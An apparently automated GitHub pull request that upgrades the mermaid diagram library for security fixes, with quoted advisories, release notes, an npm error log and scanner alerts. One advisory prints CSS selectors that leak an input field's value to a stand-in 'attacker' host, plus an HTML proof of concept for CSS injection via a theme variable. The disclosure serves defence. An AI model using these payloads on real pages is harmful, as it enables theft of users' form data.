fix(deps): update dependency mermaid to v9 [security] by renovate[bot] · Pull Request #671 · moul/depviz

renovate · 2024-08-06T10:45:02Z

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
mermaid	`8.5.0` → `9.1.2`

GitHub Vulnerability Alerts

CVE-2021-43861

Impact

Malicious diagrams can contain javascript code that can be run at diagram readers machines.

Patches

The users should upgrade to version 8.13.8

Workarounds

You need to upgrade in order to avoid this issue.

CVE-2021-35513

Mermaid before 8.11.0 allows XSS when the antiscript feature is used.

CVE-2022-31108

An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the value attribute one character at a time. Whenever there is an actual match, an http request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character.

input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

Open an issue in example link to repo
Email us at example email address

Product

mermaid.js

Tested Version

v9.1.1

Details

Issue 1: Multiple CSS Injection (`GHSL-2022-036`)

By supplying a carefully crafted textColor theme variable, an attacker can inject arbitrary CSS rules into the document. In the following snippet we can see that getStyles does not sanitize any of the theme variables leaving the door open for CSS injection.

Snippet from src/styles.js:

const getStyles = (type, userStyles, options) => {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }

For example, if we set textColor to "green;} #target { background-color: crimson }" the resulting CSS will contain a new selector #target that will apply a crimson background color to an arbitrary element.

<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>

In the proof of concept above we used the textColor variable to inject CSS, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:

Impact

This issue may lead to Information Disclosure via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.

Release Notes

mermaid-js/mermaid (mermaid)

`v9.1.2`

Compare Source

Release Notes

🚀 Features

Add support for cyclic themeVariable rotation when more than 8 branches (#3049) @ashishjain0512
#3060 support cherry commit in gitgraph (#3115) @ashishjain0512
#3080 Adding rotated commit label functionality (#3113) @ashishjain0512
feat: adding "Critical Region"/"Option" and "Break" blocks to sequence diagram (#3063) @financelurker
[Experimental] Add C4 Diagram. Compatible with C4-PlantUML syntax. (#3038) @pinghe

Bug Fixes & Cleanup

#3050 Renaming setTitle to setAccTitle (#3051) @knsv
Fix for case where a compound state has a transition to it self. (#3092) @knsv
Handle diagram paddings in a consistent way (#3118) @knsv
Separation between title and accessibility title (sometimes) (#3075) @knsv
Removed unnecessary textLength attribute. (#3057) @mgenereu
Removed the Sass files (#3114) @siddhant-tripathy1

Documentation

Make initThrowsErrors available to clients (#3052) @MindaugasLaganeckas
Styling links default (#3120) @flywire
[Documentation] Re-order theme variables (#3030) @sylhare
[Documentation] Use actual theme name (#3054) @sylhare
Fixed whitespace typo in Class diagram (#3035) @SlideeScherz
Fixing various typos (#3094) @deining
docs: fix capitalisation of well known technologies (#3064) @detj
docs: remove edit on GitHub duplicate (#3059) @schmelto
typos in configuration.md corrected (#3122) @activus-d

Dependecy updates

chore(deps): bump dompurify from 2.3.6 to 2.3.8 (#3045) @dependabot
chore(deps-dev): bump @applitools/eyes-cypress from 3.25.7 to 3.26.0 (#3071) @dependabot
chore(deps-dev): bump @applitools/eyes-cypress from 3.26.0 to 3.26.1 (#3105) @dependabot
chore(deps-dev): bump @applitools/eyes-cypress from 3.26.1 to 3.26.2 (#3136) @dependabot
chore(deps-dev): bump @babel/core from 7.17.10 to 7.18.0 (#3069) @dependabot
chore(deps-dev): bump @babel/core from 7.18.0 to 7.18.2 (#3083) @dependabot
chore(deps-dev): bump @babel/core from 7.18.2 to 7.18.5 (#3134) @dependabot
chore(deps-dev): bump @babel/eslint-parser from 7.17.0 to 7.18.2 (#3087) @dependabot
chore(deps-dev): bump @babel/preset-env from 7.17.10 to 7.18.0 (#3068) @dependabot
chore(deps-dev): bump @babel/preset-env from 7.18.0 to 7.18.2 (#3084) @dependabot
chore(deps-dev): bump @commitlint/cli from 16.2.4 to 16.3.0 (#3040) @dependabot
chore(deps-dev): bump @commitlint/cli from 16.3.0 to 17.0.0 (#3070) @dependabot
chore(deps-dev): bump @commitlint/cli from 17.0.0 to 17.0.1 (#3086) @dependabot
chore(deps-dev): bump @commitlint/cli from 17.0.1 to 17.0.2 (#3102) @dependabot
chore(deps-dev): bump @commitlint/config-conventional from 16.2.4 to 17.0.0 (#3067) @dependabot
chore(deps-dev): bump @commitlint/config-conventional from 17.0.0 to 17.0.2 (#3104) @dependabot
chore(deps-dev): bump babel-jest from 28.1.0 to 28.1.1 (#3137) @dependabot
chore(deps-dev): bump concurrently from 7.1.0 to 7.2.0 (#3039) @dependabot
chore(deps-dev): bump concurrently from 7.2.0 to 7.2.1 (#3065) @dependabot
chore(deps-dev): bump cypress from 9.6.0 to 9.6.1 (#3041) @dependabot
chore(deps-dev): bump cypress from 9.6.1 to 9.7.0 (#3082) @dependabot
chore(deps-dev): bump eslint from 8.15.0 to 8.16.0 (#3066) @dependabot
chore(deps-dev): bump eslint from 8.16.0 to 8.17.0 (#3103) @dependabot
chore(deps-dev): bump eslint from 8.4.1 to 8.15.0 (#3042) @dependabot
chore(deps-dev): bump eslint-plugin-jest from 26.1.5 to 26.2.2 (#3044) @dependabot
chore(deps-dev): bump eslint-plugin-jest from 26.2.2 to 26.4.5 (#3085) @dependabot
chore(deps-dev): bump eslint-plugin-jest from 26.4.5 to 26.5.3 (#3110) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 39.2.9 to 39.3.0 (#3072) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 39.3.0 to 39.3.2 (#3088) @dependabot
chore(deps-dev): bump jest from 28.1.0 to 28.1.1 (#3131) @dependabot
chore(deps-dev): bump jest-environment-jsdom from 28.1.0 to 28.1.1 (#3129) @dependabot
chore(deps-dev): bump lint-staged from 12.4.1 to 12.4.2 (#3081) @dependabot
chore(deps-dev): bump lint-staged from 12.4.2 to 13.0.0 (#3109) @dependabot
chore(deps-dev): bump lint-staged from 13.0.0 to 13.0.1 (#3132) @dependabot
chore(deps-dev): bump terser-webpack-plugin from 5.3.1 to 5.3.3 (#3106) @dependabot
chore(deps-dev): bump webpack from 5.72.0 to 5.72.1 (#3043) @dependabot
chore(deps-dev): bump webpack from 5.72.1 to 5.73.0 (#3108) @dependabot
chore(deps-dev): bump webpack-cli from 4.9.2 to 4.10.0 (#3130) @dependabot
chore(deps-dev): bump webpack-dev-server from 4.9.0 to 4.9.1 (#3107) @dependabot
chore(deps-dev): bump webpack-dev-server from 4.9.1 to 4.9.2 (#3133) @dependabot

🎉 Thanks to all contributors helping with this release! 🎉

`v9.1.1`

Compare Source

Release Notes

Fix for #3025 @ashishjain0512

🎉 Thanks to all contributors helping with this release! 🎉

`v9.1.0`

Compare Source

Release Notes

🚀 Features

Accessibility added to the charts (#3008) (#2732) @knsv @gwincr11 @therzka @khiga8 @el-mapache @lindseywild
feat: add hideUnusedParticipants and some cleanup (#2943) @Yash-Singh1
Added default new line in the diagram text before parsing for special… (#2983) @ashishjain0512
Added support to change the position of the main branch (#3010) @ashishjain0512
Sequence autonumbering and Git fix options parsing (#2981) @Zumbala
GitGraph: add support for branch ordering (#3002) @husa
fix mermaidAPI.parse() behavior to match documentation, add tests to ensure behavior matches docs (#3004) @timmaffett
protect config.js from attempting to use invalid theme name (which corrupted mermaid use until reset()) (#2987) @timmaffett
Handling flowchart link style for html labels using legacy renderer #2951

Documentation

Doc/update zh readme (#3005) @lexmin0412
Documentation fix for 8.6.0 readme - add missing quotes to example theme default (#2986) @timmaffett
Fix typos in gitgraph.md (#2999) @Lance-DC
Remove a stray word (#2974) @egnor
Update README.md (#2989) @guidanoli

Dependecy updates

chore(deps): Included dependency review (#2984) @naveensrinivasan
chore(deps): bump stylis from 4.1.0 to 4.1.1 (#2967) @dependabot
chore(deps-dev): bump @babel/core from 7.17.9 to 7.17.10 (#2996) @dependabot
chore(deps-dev): bump @babel/preset-env from 7.16.11 to 7.17.10 (#2991) @dependabot
chore(deps-dev): bump @commitlint/cli from 16.2.3 to 16.2.4 (#2992) @dependabot
chore(deps-dev): bump @commitlint/config-conventional from 16.2.1 to 16.2.4 (#2997) @dependabot
chore(deps-dev): bump babel-jest from 27.5.1 to 28.0.3 (#2990) @dependabot
chore(deps-dev): bump babel-jest from 28.0.3 to 28.1.0 (#3013) @dependabot
chore(deps-dev): bump babel-loader from 8.2.4 to 8.2.5 (#2964) @dependabot
chore(deps-dev): bump cypress from 9.5.4 to 9.6.0 (#2998) @dependabot
chore(deps-dev): bump eslint from 8.13.0 to 8.14.0 (#2966) @dependabot
chore(deps-dev): bump eslint from 8.14.0 to 8.15.0 (#3015) @dependabot
chore(deps-dev): bump eslint-plugin-jest from 26.1.4 to 26.1.5 (#2965) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 39.2.2 to 39.2.8 (#2968) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 39.2.8 to 39.2.9 (#2994) @dependabot
chore(deps-dev): bump husky from 7.0.4 to 8.0.0 (#3016) @dependabot
chore(deps-dev): bump jest from 27.5.1 to 28.0.3 (#2995) @dependabot
chore(deps-dev): bump lint-staged from 12.3.8 to 12.4.0 (#2969) @dependabot
chore(deps-dev): bump lint-staged from 12.4.0 to 12.4.1 (#2993) @dependabot
chore(deps-dev): bump webpack-dev-server from 4.8.1 to 4.9.0 (#3014) @dependabot
chore: Enable codeql action (#2982) @naveensrinivasan
chore: Set permissions for GitHub actions (#2971) @naveensrinivasan

🎉 Thanks to all contributors helping with this release! 🎉

`v9.0.1`

Compare Source

Release Notes

🐛 Bug Fixes

Removal of vulnerability (#2958) @knsv
Fix broken re-rendering of gitGraph in Mermaid Live Editor

🎉 Thanks to all contributors helping with this release! 🎉

`v9.0.0`

Compare Source

Release Notes

Main feature

1252 gitgraph reinvented (#2877) @knsv

Moving the gitGraph from experimental alpha status to a fully supported diagram type which handles theming and directives. The grammar has changed slightly from the alpha version, and no longer supports reset operations and some internal fast-forwarding has been removed for simplicity. Some few GitGraphs based on the alpha version might break with the update. This is the reason for the major version number update.

We now support:

Commit types
Multiple branches in sperate lanes
Theming

Other changes:

Add dompurify config option (#2831) @gwincr11
Class diagram accessibility (#2911) @gwincr11
Double Circle Node Shape (#2740) @Guy-Adler
ER and Sequence Chart Accessibility (#2832) @gwincr11
SequenceDiagram: Use correct default sans-serif fonts for actors and tasks (#2729) @dbartholomae
Update to latest version of sanitize-url (#2790) @dbussink
feat: add accessibility title and description to pie chart (#2747) @gwincr11
sync Chinese readme (#2797) @lexmin0412
small bug with the id on the title (#2773) @gwincr11
fix: autonumber bug (#2814) @kerwin612

Documentation updates

Add mkdocs-material to the integrations (#2780) @chrimaho
Added technical sequence diagram to example docs (#2836) @riaanduplessis
Fix typo in flowchart.md (#2741) @mingpepe
Fixes syntax error in n00b-gettingStarted.md (#2735) @bolshoytoster
Render example instead of just showing the code (#2835) @Kaligule
Switch to gender neutral terms (#2876) @inclusive-coding-bot
Update theming.md (#2855) @Crocin
Updated docs to use mermaid 8.14 (#2819) @RonaldZielaznicki
Workflow: Check if README.md and docs/README.md are in sync (#2755) @kuanyi-ng
docs(README*.md): http => https (#2727) @Schweinepriester
docs(integrations): add link to mdbook-mermaid (#2786) @lukehsiao
docs: Add GitHub native support (#2725) @BastianZim
docs: Add Gitea (#2731) @silverwind
docs: livebook and exdocs integrations (#2728) @RudolfMan
docs: add showData config to Pie Chart (#2758) @uskey512
docs: adds alt text to images, corrects heading structure (#2908) @lindseywild
fix typos in doc (#2787) @dkkb

Dependency updates

chore(deps): bump EndBug/add-and-commit from 8.0.1 to 8.0.2 (#2722) @dependabot
chore(deps): bump EndBug/add-and-commit from 8.0.2 to 9 (#2823) @dependabot
chore(deps): bump actions/checkout from 2 to 3 (#2803) @dependabot
chore(deps): bump actions/setup-node from 2 to 3 (#2784) @dependabot
chore(deps): bump dompurify from 2.3.5 to 2.3.6 (#2763) @dependabot
chore(deps): bump follow-redirects from 1.14.7 to 1.14.8 (#2711) @dependabot
chore(deps): bump minimist from 1.2.5 to 1.2.6 (#2868) @dependabot
chore(deps): bump node-forge from 1.2.1 to 1.3.0 (#2847) @dependabot
chore(deps): bump stylis from 4.0.13 to 4.1.0 (#2891) @dependabot
chore(deps-dev): bump @babel/core from 7.17.0 to 7.17.2 (#2716) @dependabot
chore(deps-dev): bump @babel/core from 7.17.2 to 7.17.5 (#2766) @dependabot
chore(deps-dev): bump @babel/core from 7.17.5 to 7.17.8 (#2838) @dependabot
chore(deps-dev): bump @babel/register from 7.17.0 to 7.17.7 (#2844) @dependabot
chore(deps-dev): bump @commitlint/cli from 16.1.0 to 16.2.1 (#2719) @dependabot
chore(deps-dev): bump @commitlint/cli from 16.2.1 to 16.2.3 (#2843) @dependabot
chore(deps-dev): bump @commitlint/config-conventional from 16.0.0 to 16.2.1 (#2718) @dependabot
chore(deps-dev): bump @percy/cli from 1.0.0-beta.74 to 1.0.0-beta.75 (#2715) @dependabot
chore(deps-dev): bump @percy/cli from 1.0.0-beta.75 to 1.0.0-beta.76 (#2782) @dependabot
chore(deps-dev): bump babel-jest from 27.5.0 to 27.5.1 (#2720) @dependabot
chore(deps-dev): bump babel-loader from 8.2.3 to 8.2.4 (#2862) @dependabot
chore(deps-dev): bump concurrently from 7.0.0 to 7.1.0 (#2889) @dependabot
chore(deps-dev): bump cypress from 9.4.1 to 9.5.0 (#2762) @dependabot
chore(deps-dev): bump cypress from 9.5.0 to 9.5.1 (#2800) @dependabot
chore(deps-dev): bump cypress from 9.5.1 to 9.5.2 (#2837) @dependabot
chore(deps-dev): bump cypress from 9.5.2 to 9.5.3 (#2890) @dependabot
chore(deps-dev): bump eslint from 8.10.0 to 8.11.0 (#2821) @dependabot
chore(deps-dev): bump eslint from 8.11.0 to 8.12.0 (#2867) @dependabot
chore(deps-dev): bump eslint from 8.8.0 to 8.9.0 (#2713) @dependabot
chore(deps-dev): bump eslint from 8.9.0 to 8.10.0 (#2783) @dependabot
chore(deps-dev): bump eslint-config-prettier from 8.3.0 to 8.4.0 (#2761) @dependabot
chore(deps-dev): bump eslint-config-prettier from 8.4.0 to 8.5.0 (#2798) @dependabot
chore(deps-dev): bump eslint-plugin-jest from 26.1.0 to 26.1.1 (#2760) @dependabot
chore(deps-dev): bump eslint-plugin-jest from 26.1.1 to 26.1.2 (#2841) @dependabot
chore(deps-dev): bump eslint-plugin-jest from 26.1.2 to 26.1.3 (#2864) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 37.7.1 to 37.9.1 (#2714) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 37.9.1 to 37.9.4 (#2764) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 37.9.4 to 37.9.7 (#2801) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 37.9.7 to 38.0.3 (#2820) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 38.0.3 to 38.0.6 (#2840) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 38.0.6 to 38.1.1 (#2863) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 38.1.1 to 38.1.6 (#2893) @dependabot
chore(deps-dev): bump jest from 27.5.0 to 27.5.1 (#2717) @dependabot
chore(deps-dev): bump lint-staged from 12.3.3 to 12.3.4 (#2721) @dependabot
chore(deps-dev): bump lint-staged from 12.3.4 to 12.3.5 (#2799) @dependabot
chore(deps-dev): bump lint-staged from 12.3.5 to 12.3.7 (#2839) @dependabot
chore(deps-dev): bump moment from 2.29.1 to 2.29.2 (#2888) @dependabot
chore(deps-dev): bump prettier from 2.5.1 to 2.6.0 (#2842) @dependabot
chore(deps-dev): bump prettier from 2.6.0 to 2.6.1 (#2866) @dependabot
chore(deps-dev): bump prettier from 2.6.1 to 2.6.2 (#2887) @dependabot
chore(deps-dev): bump prettier-plugin-jsdoc from 0.3.30 to 0.3.31 (#2822) @dependabot
chore(deps-dev): bump prettier-plugin-jsdoc from 0.3.31 to 0.3.33 (#2865) @dependabot
chore(deps-dev): bump prettier-plugin-jsdoc from 0.3.33 to 0.3.36 (#2892) @dependabot
chore(deps-dev): bump webpack from 5.68.0 to 5.69.1 (#2765) @dependabot
chore(deps-dev): bump webpack from 5.69.1 to 5.70.0 (#2802) @dependabot
chore(deps-dev): bump webpack from 5.70.0 to 5.71.0 (#2894) @dependabot

🎉 Thanks to all contributors helping with this release! 🎉

`v8.14.0`

Compare Source

Release Notes

Main feature

Adding new more secure security level 'sandbox' where all rendering happens in a sandboxed iframe. The returned element in this mode is also an iframe with the svg as a base64 encoded url. (#2654)

Documentation updates

Documention updates in the main mardownfile in the repo adding mermaid diagrams instead of images of mermaid diagrams (#2676) @knsv
Reference mkdocs-mermaid2-plugin for MkDocs (#2702) @jfuentescpp
docs: update for re-ordering (#2704) @arfanliaqat
sync Chinese readme contents (#2656) @lexmin0412

Dependecy updates

Bump @babel/core from 7.16.7 to 7.16.12 (#2658) @dependabot
Bump @babel/preset-env from 7.16.8 to 7.16.11 (#2660) @dependabot
Bump @commitlint/cli from 16.0.2 to 16.1.0 (#2664) @dependabot
Bump EndBug/add-and-commit from 7 to 8.0.1 (#2665) @dependabot
Bump cached-path-relative from 1.0.2 to 1.1.0 (#2671) @dependabot
Bump cypress from 9.2.1 to 9.3.1 (#2663) @dependabot
Bump eslint-plugin-jsdoc from 37.6.1 to 37.6.3 (#2662) @dependabot
Bump lint-staged from 12.1.7 to 12.3.1 (#2661) @dependabot
Bump webpack from 5.66.0 to 5.67.0 (#2659) @dependabot
chore(deps): bump dompurify from 2.3.4 to 2.3.5 (#2683) @dependabot
chore(deps-dev): bump @babel/core from 7.16.12 to 7.17.0 (#2697) @dependabot
chore(deps-dev): bump @babel/eslint-parser from 7.16.5 to 7.17.0 (#2700) @dependabot
chore(deps-dev): bump @babel/register from 7.16.9 to 7.17.0 (#2699) @dependabot
chore(deps-dev): bump @percy/cli from 1.0.0-beta.73 to 1.0.0-beta.74 (#2680) @dependabot
chore(deps-dev): bump babel-jest from 27.4.6 to 27.5.0 (#2701) @dependabot
chore(deps-dev): bump cypress from 9.3.1 to 9.4.1 (#2692) @dependabot
chore(deps-dev): bump eslint from 8.7.0 to 8.8.0 (#2682) @dependabot
chore(deps-dev): bump eslint-plugin-jest from 25.7.0 to 26.0.0 (#2679) @dependabot
chore(deps-dev): bump eslint-plugin-jest from 26.0.0 to 26.1.0 (#2693) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 37.6.3 to 37.7.0 (#2681) @dependabot
chore(deps-dev): bump eslint-plugin-jsdoc from 37.7.0 to 37.7.1 (#2690) @dependabot
chore(deps-dev): bump jest from 27.4.7 to 27.5.0 (#2696) @dependabot
chore(deps-dev): bump lint-staged from 12.3.1 to 12.3.2 (#2684) @dependabot
chore(deps-dev): bump lint-staged from 12.3.2 to 12.3.3 (#2691) @dependabot
chore(deps-dev): bump terser-webpack-plugin from 5.3.0 to 5.3.1 (#2694) @dependabot
chore(deps-dev): bump webpack from 5.67.0 to 5.68.0 (#2698) @dependabot
chore(deps-dev): bump webpack-cli from 4.9.1 to 4.9.2 (#2678) @dependabot
chore(deps-dev): bump webpack-dev-server from 4.7.3 to 4.7.4 (#2695) @dependabot

🎉 Thanks to all contributors helping with this release! 🎉

`v8.13.10`

Compare Source

Release Notes

2646 Removes a possible way for a diagram author to trigger a JavaScript using in diagram code. (#2655) @knsv
Bump @babel/preset-env from 7.16.7 to 7.16.8 (#2642) @dependabot
Bump @babel/register from 7.16.7 to 7.16.9 (#2639) @dependabot
Bump @percy/cli from 1.0.0-beta.71 to 1.0.0-beta.73 (#2638) @dependabot
Bump cypress from 9.2.0 to 9.2.1 (#2636) @dependabot
Bump eslint from 8.6.0 to 8.7.0 (#2637) @dependabot
Bump eslint-plugin-jest from 25.3.4 to 25.7.0 (#2640) @dependabot
Bump webpack from 5.65.0 to 5.66.0 (#2635) @dependabot
Bump webpack-dev-server from 4.7.2 to 4.7.3 (#2641) @dependabot
Remove console.log from common.js (#2621) @Billiam
docs: Update sequenceDiagram.md: remove a duplication (#2624) @hiramekun

🎉 Thanks to all contributors helping with this release! 🎉

`v8.13.9`

Compare Source

Release Notes

Changes to the functionality

chore: make husky hooks executable (#2594) @Yash-Singh1
fix: bug #2346 "ER-attribute comments not work" (#2598) @ebjornset
fix: bug #2631 Fix for more robust rendering of gitGraph @knsv
fix: bug #2632 Fix for XSS vulnerability in classDiagrams @knsv

Documentation changes

Add Notion to integrations.md (#2593) @kale-stew
Added Mermaid in open source docs to tutorial page (#2613) @chrismetz09
Change "graph" to "flowchart" (#2612) @Erhannis
Fix documentation full examples (#2615) @magmax
Fix typo (#2614) @meganemura
docs: fix broken image links in gantt.md (#2599) @esphas

Dependency updates

Bump @babel/core from 7.16.5 to 7.16.7 (#2610) @dependabot
Bump @babel/preset-env from 7.16.5 to 7.16.7 (#2602) @dependabot
Bump @babel/register from 7.16.5 to 7.16.7 (#2601) @dependabot
Bump @commitlint/cli from 16.0.0 to 16.0.1 (#2607) @dependabot
Bump @commitlint/cli from 16.0.1 to 16.0.2 (#2619) @dependabot
Bump babel-jest from 27.4.5 to 27.4.6 (#2616) @dependabot
Bump concurrently from 6.5.1 to 7.0.0 (#2603) @dependabot
Bump eslint from 8.5.0 to 8.6.0 (#2608) @dependabot
Bump eslint-plugin-jest from 25.3.0 to 25.3.4 (#2609) @dependabot
Bump eslint-plugin-jsdoc from 37.4.0 to 37.5.0 (#2605) [@dependabot](https://redirect.github.com

renovate · 2024-08-06T10:45:03Z

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

any of the package files in this branch needs updating, or
the branch becomes conflicted, or
you click the rebase/retry checkbox if found above, or
you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: web/package-lock.json

npm warn Unknown env config "store". This will stop working in the next major version of npm.
npm warn ERESOLVE overriding peer dependency
npm warn While resolving: @jimp/plugin-threshold@0.10.3
npm warn Found: @jimp/plugin-color@0.6.8
npm warn node_modules/@jimp/plugin-color
npm warn   @jimp/plugin-color@"^0.6.8" from @jimp/plugins@0.6.8
npm warn   node_modules/@jimp/plugins
npm warn     @jimp/plugins@"^0.6.8" from jimp@0.6.8
npm warn     node_modules/jimp
npm warn
npm warn Could not resolve dependency:
npm warn peer @jimp/plugin-color@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn node_modules/@jimp/plugin-threshold
npm warn   @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn   node_modules/potrace/node_modules/@jimp/plugins
npm warn
npm warn Conflicting peer dependency: @jimp/plugin-color@1.6.0
npm warn node_modules/@jimp/plugin-color
npm warn   peer @jimp/plugin-color@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn   node_modules/@jimp/plugin-threshold
npm warn     @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn     node_modules/potrace/node_modules/@jimp/plugins
npm warn ERESOLVE overriding peer dependency
npm warn While resolving: @jimp/plugin-threshold@0.10.3
npm warn Found: @jimp/plugin-resize@0.6.8
npm warn node_modules/@jimp/plugin-resize
npm warn   peer @jimp/plugin-resize@">=0.3.5" from @jimp/plugin-contain@0.6.8
npm warn   node_modules/@jimp/plugin-contain
npm warn     @jimp/plugin-contain@"^0.6.8" from @jimp/plugins@0.6.8
npm warn     node_modules/@jimp/plugins
npm warn   5 more (@jimp/plugin-cover, @jimp/plugin-rotate, ...)
npm warn
npm warn Could not resolve dependency:
npm warn peer @jimp/plugin-resize@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn node_modules/@jimp/plugin-threshold
npm warn   @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn   node_modules/potrace/node_modules/@jimp/plugins
npm warn
npm warn Conflicting peer dependency: @jimp/plugin-resize@1.6.0
npm warn node_modules/@jimp/plugin-resize
npm warn   peer @jimp/plugin-resize@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn   node_modules/@jimp/plugin-threshold
npm warn     @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn     node_modules/potrace/node_modules/@jimp/plugins
npm error code ERESOLVE
npm error ERESOLVE could not resolve
npm error
npm error While resolving: eslint-watch@7.0.0
npm error Found: eslint@8.2.0
npm error node_modules/eslint
npm error   dev eslint@"8.2.0" from the root project
npm error   peer eslint@">= 4.12.1" from babel-eslint@10.1.0
npm error   node_modules/babel-eslint
npm error     dev babel-eslint@"10.1.0" from the root project
npm error   10 more (eslint-config-airbnb, eslint-config-airbnb-base, ...)
npm error
npm error Could not resolve dependency:
npm error peer eslint@">=7 <8.0.0" from eslint-watch@7.0.0
npm error node_modules/eslint-watch
npm error   dev eslint-watch@"7.0.0" from the root project
npm error
npm error Conflicting peer dependency: eslint@7.32.0
npm error node_modules/eslint
npm error   peer eslint@">=7 <8.0.0" from eslint-watch@7.0.0
npm error   node_modules/eslint-watch
npm error     dev eslint-watch@"7.0.0" from the root project
npm error
npm error Fix the upstream dependency conflict, or retry
npm error this command with --force or --legacy-peer-deps
npm error to accept an incorrect (and potentially broken) dependency resolution.
npm error
npm error
npm error For a full report see:
npm error /runner/cache/others/npm/_logs/2026-02-02T18_54_48_137Z-eresolve-report.txt
npm error A complete log of this run can be found in: /runner/cache/others/npm/_logs/2026-02-02T18_54_48_137Z-debug-0.log

socket-security · 2025-12-04T19:49:22Z

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff	Package	Supply Chain Security	Vulnerability	Quality	Maintenance	License
	npm/mermaid@8.5.0 ⏵ 9.1.2	⁺²	⁺⁹	⁺¹	⁺²

View full report

socket-security · 2025-12-04T19:49:23Z

Warning

Review the following alerts detected in dependencies.

According to your organization's Security Policy, it is recommended to resolve "Warn" alerts. Learn more about Socket for GitHub.

Action	Severity	Alert (click "▶" to expand/collapse)
Warn		Critical CVE: DOMPurify vulnerable to tampering by prototype polution CVE: GHSA-p3vf-v8qc-cwcr DOMPurify vulnerable to tampering by prototype polution (CRITICAL) Affected versions: < 2.4.2 Patched version: 2.4.2 From: `?` → `npm/mermaid@9.1.2` → `npm/dompurify@2.3.8` ℹ Read more on: This package \| This alert \| What is a critical CVE? Next steps: Take a moment to review the security alert above. Review the linked package source code to understand the potential risk. Ensure the package is not malicious before proceeding. If you're unsure how to proceed, reach out to your security team or ask the Socket team for help at `support@socket.dev`. Suggestion: Remove or replace dependencies that include known critical CVEs. Consumers can use dependency overrides or npm audit fix --force to remove vulnerable dependencies. Mark the package as acceptable risk. To ignore this alert only in this pull request, reply with the comment `@SocketSecurity ignore npm/dompurify@2.3.8`. You can also ignore all packages with `@SocketSecurity ignore-all`. To ignore an alert for all future pull requests, use Socket's Dashboard to change the triage state of this alert.

View full report

renovate bot requested a review from moul as a code owner August 6, 2024 10:45

renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from 3547410 to 8b583e0 Compare August 13, 2025 23:34

renovate bot changed the title ~~fix(deps): update dependency mermaid to v9 [security]~~ fix(deps): update dependency mermaid to v10 [security] Aug 13, 2025

renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from 8b583e0 to 6248493 Compare September 26, 2025 07:05

renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from 6248493 to f5ab9e5 Compare October 16, 2025 03:53

renovate bot changed the title ~~fix(deps): update dependency mermaid to v10 [security]~~ fix(deps): update dependency mermaid to v9 [security] Oct 16, 2025

renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from f5ab9e5 to df6a0b5 Compare October 23, 2025 06:58

renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from df6a0b5 to c903d7c Compare November 11, 2025 00:11

renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from c903d7c to aa051c9 Compare November 19, 2025 03:48

renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from aa051c9 to 1e9b835 Compare December 4, 2025 19:48

renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from 1e9b835 to 122d544 Compare January 1, 2026 00:16

renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from 122d544 to 231bd87 Compare January 9, 2026 12:03

renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from 231bd87 to af3de01 Compare January 19, 2026 15:27

fix(deps): update dependency mermaid to v9 [security]

ceda6dd

